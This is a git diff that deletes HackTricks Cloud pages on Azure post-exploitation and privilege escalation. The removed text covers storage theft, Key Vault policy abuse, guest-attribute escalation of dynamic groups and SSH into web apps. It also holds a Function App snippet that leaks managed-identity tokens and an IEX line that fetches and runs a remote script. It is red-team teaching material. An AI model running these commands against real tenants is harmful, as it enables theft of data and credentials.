-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md
deleted file mode 100644
index d63a1375f..000000000
--- a/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md
+++ /dev/null
@@ -1,71 +0,0 @@
-# Az - Blob Storage Post Exploitation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Storage Privesc - -For more information about storage check: - -{% content-ref url="../az-services/az-storage.md" %} -[az-storage.md](../az-services/az-storage.md) -{% endcontent-ref %} - -### Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read - -A principal with this permission will be able to **list** the blobs (files) inside a container and **download** the files which might contain **sensitive information**. - -```bash -# e.g. Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read -az storage blob list \ - --account-name \ - --container-name --auth-mode login - -az storage blob download \ - --account-name \ - --container-name \ - -n file.txt --auth-mode login -``` - -### Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write - -A principal with this permission will be able to **write and overwrite files in containers** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some code stored in a blob): - -```bash -# e.g. Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write -az storage blob upload \ - --account-name \ - --container-name \ - --file /tmp/up.txt --auth-mode login --overwrite -``` - -### \*/delete - -This would allow to delete objects inside the storage account which might **interrupt some services** or make the client **lose valuable information**. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md
deleted file mode 100644
index 648443c17..000000000
--- a/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md
+++ /dev/null
@@ -1,74 +0,0 @@
-# Az - File Share Post Exploitation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## File Share Post Exploitation - -For more information about file shares check: - -{% content-ref url="../az-services/az-file-shares.md" %} -[az-file-shares.md](../az-services/az-file-shares.md) -{% endcontent-ref %} - -### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/read - -A principal with this permission will be able to **list** the files inside a file share and **download** the files which might contain **sensitive information**. - -```bash -# List files inside an azure file share -az storage file list \ - --account-name \ - --share-name \ - --auth-mode login --enable-file-backup-request-intent - -# Download an specific file -az storage file download \ - --account-name \ - --share-name \ - --path \ - --dest /path/to/down \ - --auth-mode login --enable-file-backup-request-intent -``` - -### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/write, Microsoft.Storage/storageAccounts/fileServices/writeFileBackupSemantics/action - -A principal with this permission will be able to **write and overwrite files in file shares** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some code stored in a file share): - -```bash -az storage blob upload \ - --account-name \ - --container-name \ - --file /tmp/up.txt --auth-mode login --overwrite -``` - -### \*/delete - -This would allow to delete file inside the shared filesystem which might **interrupt some services** or make the client **lose valuable information**. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md
deleted file mode 100644
index 8069be143..000000000
--- a/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md
+++ /dev/null
@@ -1,47 +0,0 @@
-# Az - Function Apps Post Exploitation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## Funciton Apps Post Exploitaiton
-
-For more information about function apps check:
-
-{% content-ref url="../az-services/az-function-apps.md" %}
-[az-function-apps.md](../az-services/az-function-apps.md)
-{% endcontent-ref %}
-
-{% hint style="danger" %}
-**Function Apps post exploitation tricks are very related to the privilege escalation tricks** so you can find all of them there:
-{% endhint %}
-
-{% content-ref url="../az-privilege-escalation/az-functions-app-privesc.md" %}
-[az-functions-app-privesc.md](../az-privilege-escalation/az-functions-app-privesc.md)
-{% endcontent-ref %}
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md
deleted file mode 100644
index 0eb9a3592..000000000
--- a/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md
+++ /dev/null
@@ -1,90 +0,0 @@
-# Az - Table Storage Post Exploitation
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Table Storage Post Exploitation - -For more information about table storage check: - -{% content-ref url="../az-services/az-table-storage.md" %} -[az-table-storage.md](../az-services/az-table-storage.md) -{% endcontent-ref %} - -### Microsoft.Storage/storageAccounts/tableServices/tables/entities/read - -A principal with this permission will be able to **list** the tables inside a table storage and **read the info** which might contain **sensitive information**. - -```bash -# List tables -az storage table list --auth-mode login --account-name - -# Read table (top 10) -az storage entity query \ - --account-name \ - --table-name \ - --auth-mode login \ - --top 10 -``` - -### Microsoft.Storage/storageAccounts/tableServices/tables/entities/write | Microsoft.Storage/storageAccounts/tableServices/tables/entities/add/action | Microsoft.Storage/storageAccounts/tableServices/tables/entities/update/action - -A principal with this permission will be able to **write and overwrite entries in tables** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some trusted data that could abuse some injection vulnerability in the app using it). - -* The permission `Microsoft.Storage/storageAccounts/tableServices/tables/entities/write` allows all the actions. 
-* The permission `Microsoft.Storage/storageAccounts/tableServices/tables/entities/add/action` allows to **add** entries -* The permission `Microsoft.Storage/storageAccounts/tableServices/tables/entities/update/action` allows to **update** existing entries - -```bash -# Add -az storage entity insert \ - --account-name \ - --table-name \ - --auth-mode login \ - --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager" - -# Replace -az storage entity replace \ - --account-name \ - --table-name \ - --auth-mode login \ - --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager" - -# Update -az storage entity merge \ - --account-name \ - --table-name \ - --auth-mode login \ - --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager" -``` - -### \*/delete - -This would allow to delete file inside the shared filesystem which might **interrupt some services** or make the client **lose valuable information**. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md
deleted file mode 100644
index 92ecc5e14..000000000
--- a/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md
+++ /dev/null
@@ -1,67 +0,0 @@
-# Az - App Services Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## App Services - -For more information about Azure App services check: - -{% content-ref url="../az-services/az-app-services.md" %} -[az-app-services.md](../az-services/az-app-services.md) -{% endcontent-ref %} - -### Microsoft.Web/sites/publish/Action, Microsoft.Web/sites/basicPublishingCredentialsPolicies/read, Microsoft.Web/sites/config/read, Microsoft.Web/sites/read, - -These permissions allows to call the following commands to get a **SSH shell** inside a web app - -* Direct option: - -```bash -# Direct option -az webapp ssh --name --resource-group -``` - -* Create tunnel and then connect to SSH: - -{% code overflow="wrap" %} -```bash -az webapp create-remote-connection --name --resource-group - -## If successfull you will get a message such as: -#Verifying if app is running.... -#App is running. Trying to establish tunnel connection... -#Opening tunnel on port: 39895 -#SSH is available { username: root, password: Docker! } - -## So from that machine ssh into that port (you might need generate a new ssh session to the jump host) -ssh root@127.0.0.1 -p 39895 -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md
deleted file mode 100644
index 9b72dba49..000000000
--- a/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/dynamic-groups.md
+++ /dev/null
@@ -1,78 +0,0 @@
-# Az - Dynamic Groups Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Basic Information - -**Dynamic groups** are groups that has a set of **rules** configured and all the **users or devices** that match the rules are added to the group. Every time a user or device **attribute** is **changed**, dynamic rules are **rechecked**. And when a **new rule** is **created** all devices and users are **checked**. - -Dynamic groups can have **Azure RBAC roles assigned** to them, but it's **not possible** to add **AzureAD roles** to dynamic groups. - -This feature requires Azure AD premium P1 license. - -## Privesc - -Note that by default any user can invite guests in Azure AD, so, If a dynamic group **rule** gives **permissions** to users based on **attributes** that can be **set** in a new **guest**, it's possible to **create a guest** with this attributes and **escalate privileges**. It's also possible for a guest to manage his own profile and change these attributes. - -Get groups that allow Dynamic membership: **`az ad group list --query "[?contains(groupTypes, 'DynamicMembership')]" --output table`** - -### Example - -* **Rule example**: `(user.otherMails -any (_ -contains "security")) -and (user.userType -eq "guest")` -* **Rule description**: Any Guest user with a secondary email with the string 'security' will be added to the group - -For the Guest user email, accept the invitation and check the current settings of **that user** in [https://entra.microsoft.com/#view/Microsoft\_AAD\_IAM/TenantOverview.ReactView](https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView).\ -Unfortunately the page doesn't allow to modify the attribute values so we need to use the API: - -{% code overflow="wrap" %} -```powershell -# Login with the gust user -az login --allow-no-subscriptions - -# Get user object ID -az ad signed-in-user show - -# Update otherMails -az rest --method PATCH \ - --url "https://graph.microsoft.com/v1.0/users/" \ - --headers 'Content-Type=application/json' \ - --body '{"otherMails": 
["newemail@example.com", "anotheremail@example.com"]}' - -# Verify the update -az rest --method GET \ - --url "https://graph.microsoft.com/v1.0/users/" \ - --query "otherMails" -``` -{% endcode %} - -## References - -* [https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/](https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md
deleted file mode 100644
index 200b90d6d..000000000
--- a/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md
+++ /dev/null
@@ -1,60 +0,0 @@
-# Az - Key Vault Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Azure Key Vault - -For more information about this service check: - -{% content-ref url="../az-services/keyvault.md" %} -[keyvault.md](../az-services/keyvault.md) -{% endcontent-ref %} - -### Microsoft.KeyVault/vaults/write - -An attacker with this permission will be able to modify the policy of a key vault (the key vault must be using access policies instead of RBAC). - -```bash -# If access policies in the output, then you can abuse it -az keyvault show --name - -# Get current principal ID -az ad signed-in-user show --query id --output tsv - -# Assign all permissions -az keyvault set-policy \ - --name \ - --object-id \ - --key-permissions all \ - --secret-permissions all \ - --certificate-permissions all \ - --storage-permissions all -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-services/README.md b/pentesting-cloud/azure-security/az-services/README.md
deleted file mode 100644
index d2f2876e2..000000000
--- a/pentesting-cloud/azure-security/az-services/README.md
+++ /dev/null
@@ -1,99 +0,0 @@
-# Az - Services
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Portals - -You can find the list of **Microsoft portals in** [**https://msportals.io/**](https://msportals.io/) - -### Raw requests - -#### Azure API via Powershell - -Get **access\_token** from **IDENTITY\_HEADER** and **IDENTITY\_ENDPOINT**: `system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');`. - -Then query the Azure REST API to get the **subscription ID** and more . - -```powershell -$Token = 'eyJ0eX..' -$URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01' -# $URI = 'https://graph.microsoft.com/v1.0/applications' -$RequestParams = @{ - Method = 'GET' - Uri = $URI - Headers = @{ - 'Authorization' = "Bearer $Token" - } -} -(Invoke-RestMethod @RequestParams).value - -# List resources and check for runCommand privileges -$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resources?api-version=2020-10-01' -$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups//providers/Microsoft.Compute/virtualMachines/ func.HttpResponse: - logging.info('Python HTTP trigger function processed a request.') - IDENTITY_ENDPOINT = os.environ['IDENTITY_ENDPOINT'] - IDENTITY_HEADER = os.environ['IDENTITY_HEADER'] - cmd = 'curl "%s?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:%s' % (IDENTITY_ENDPOINT, IDENTITY_HEADER) - val = os.popen(cmd).read() - return func.HttpResponse(val, status_code=200) -``` - -## List of Services - -**The pages of this section are ordered by Azure service. 
In there you will be able to find information about the service (how it works and capabilities) and also how to enumerate each service.** - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-services/az-acr.md b/pentesting-cloud/azure-security/az-services/az-acr.md
deleted file mode 100644
index e3c5bf95c..000000000
--- a/pentesting-cloud/azure-security/az-services/az-acr.md
+++ /dev/null
@@ -1,76 +0,0 @@
-# Az - ACR
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Basic Information - -Azure Container Registry (ACR) is a managed service provided by Microsoft Azure for **storing and managing Docker container images and other artifacts**. It offers features such as integrated developer tools, geo-replication, security measures like role-based access control and image scanning, automated builds, webhooks and triggers, and network isolation. It works with popular tools like Docker CLI and Kubernetes, and integrates well with other Azure services. - -### Enumerate - -To enumerate the service you could use the script [**Get-AzACR.ps1**](https://github.com/NetSPI/MicroBurst/blob/master/Misc/Get-AzACR.ps1): - -{% code overflow="wrap" %} -```bash -# List Docker images inside the registry -IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/NetSPI/MicroBurst/master/Misc/Get-AzACR.ps1") - -Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Internet Explorer\Main" -Name "DisableFirstRunCustomize" -Value 2 - -Get-AzACR -username -password -registry .azurecr.io -``` -{% endcode %} - -{% tabs %} -{% tab title="az cli" %} -```bash -az acr list --output table -az acr show --name MyRegistry --resource-group MyResourceGroup -``` -{% endtab %} - -{% tab title="Az Powershell" %} -```powershell -# List all ACRs in your subscription -Get-AzContainerRegistry - -# Get a specific ACR -Get-AzContainerRegistry -ResourceGroupName "MyResourceGroup" -Name "MyRegistry" -``` -{% endtab %} -{% endtabs %} - -Login & Pull from the registry - -```bash -docker login .azurecr.io --username --password -docker pull .azurecr.io/: -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-services/az-application-proxy.md b/pentesting-cloud/azure-security/az-services/az-application-proxy.md
deleted file mode 100644
index 8b5f6c1c0..000000000
--- a/pentesting-cloud/azure-security/az-services/az-application-proxy.md
+++ /dev/null
@@ -1,66 +0,0 @@
-# Az - Application Proxy
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Basic Information - -[From the docs:](https://learn.microsoft.com/en-us/entra/identity/app-proxy/application-proxy) - -Azure Active Directory's Application Proxy provides **secure remote access to on-premises web applications**. After a **single sign-on to Azure AD**, users can access both **cloud** and **on-premises applications** through an **external URL** or an internal application portal. - -It works like this: - -
